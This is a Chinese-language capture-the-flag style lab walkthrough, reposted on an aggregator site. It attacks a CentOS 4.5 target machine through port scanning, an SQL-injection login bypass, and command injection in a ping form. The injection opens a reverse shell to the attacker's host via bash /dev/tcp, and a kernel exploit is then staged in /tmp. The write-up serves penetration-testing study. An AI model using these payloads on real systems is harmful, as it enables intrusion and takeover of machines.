行业公司网站建设国际新闻视频
行业公司网站建设,国际新闻视频,莱芜手机网站建设电话,WordPress中菜单变色目录 环境配置
端口扫描
漏送发现
漏送利用
提权#xff08;内核漏洞提权#xff09; 环境配置
环境配置的过程同主页该专栏第一个靶场#xff0c;不在赘述。
端口扫描
首先通过arp-scan并根据靶机的mac地址确定靶机的IP地址 然后对靶机进行一个扫描 首先扫描到OpenS…目录 环境配置
端口扫描
漏送发现
漏送利用
提权内核漏洞提权 环境配置
环境配置的过程同主页该专栏第一个靶场不在赘述。
端口扫描
首先通过arp-scan并根据靶机的mac地址确定靶机的IP地址 然后对靶机进行一个扫描 首先扫描到OpenSSH 3.9p1 (protocol 1.99)这个是什么意思呢
Openssh是一个使用ssh协议进行通信的软件3.9p1是他的版本号后面的ptotocol表示openssh所支持的ssh版本1和版本2.
Apache就不用多说了中间件嘛
111端口的rpcbind服务是rpc服务的守护进程也就是服务端而2应该是他的版本#100000表示rpc程序服务编号为100000。
623端口开放的服务为status这个跟NFS协议有关status是NFS RPC服务的一部分而NFS协议客户端和服务端之间的通信是通过RPC协议来进行的。如果开放了这个服务的话可以看一下有没有NFS协议如果有的话可以看一下存不存在NFS共享信息泄露。这里不存在。
631端口开放的ipp是一种允许计算机通过网络进行打印的协议而CUPS是一个用于管理打印任务的软件系统1.1是版本号
3306的mysql就不用多说了数据库。 漏送发现
由于这里发现nmap扫描到MySQL存在未授权登录尝试登录一下提示我的IP不能登录判断应该靶机设置的只能本机登录。 利用hydra爆破一下ssh和mysql当然也是不行的预料之中
根据nmap扫到的 利用dirsearch进行一下目录扫描
在扫描目录之前也通过nmap得到的版本号通过searchsploit进行历史漏洞的搜寻无果。 访问一下扫描到的manual/index.html好像没有什么用处 由于靶机开启了http服务直接访问可以看到是一个登录框遇到这里一般可以测一下爆破和注入。因为我们是需要拿权限所以这里XSS之类的就不测了。 漏送利用
直接用最常用的万能密码尝试绕过登录验证直接就绕过了。
账号root or 1 1
密码root or 1 1 bp抓一下包在框里填什么它都会去帮你ping那明显就可以利用管道符让他帮我们执行命令感觉这里跟CTF比较像 这里尝试读取密码读取不成功考虑到对某些命令进行了过滤于是我尝试了很多中下载命令但是都不行base64编码和url编码也是不行于是尝试在kali上面利用python开启http服务在这里利用wget去下载后门也是不行。 索性用插件生成一个反弹shell的命令然后直接反弹。 这里执行命令
127.0.0.1 | bash -c exec bash -i /dev/tcp/192.168.253.145/6666 1 提前监听6666端口也是成功的反弹了shell权限是低权限尝试提权。 提权内核漏洞提权
首先查看一下linux内核版本以及操作系统是什么发行版搜集一下信息。
内核版本是2.6.9发行版是centos4.5 根据内核版本去搜一下漏洞类型为本地的就一个但是版本也不符合
地址Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers 通过发型版本去搜一下刚好有一个提权漏洞。版本符合。先将POC下载到本地然后在kali上开启http服务在靶机上下载下来。 Python起http服务 这里在有两个问题因为在打靶机的时候使用了bp默认监听8080端口那使用python开启http服务时默认也是8080端口会提示启动不了。可以换个端口
第二个就是在下载C文件时会提示没有权限写入然后不断换目录去下载一直不行最后到tmp目录下载成功。 这里tmp目录可以写入是因为他是存放临时文件的目录一般所有用户都可以读取和写入。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/87902.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!